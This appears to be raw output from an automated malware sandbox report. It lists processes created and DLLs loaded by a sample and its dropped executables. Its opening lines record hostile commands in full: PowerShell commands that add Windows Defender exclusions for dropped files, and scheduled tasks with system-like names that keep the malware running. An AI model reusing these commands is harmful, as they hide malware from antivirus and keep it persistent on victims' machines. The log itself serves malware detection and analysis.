                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /fJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /fJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: version.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
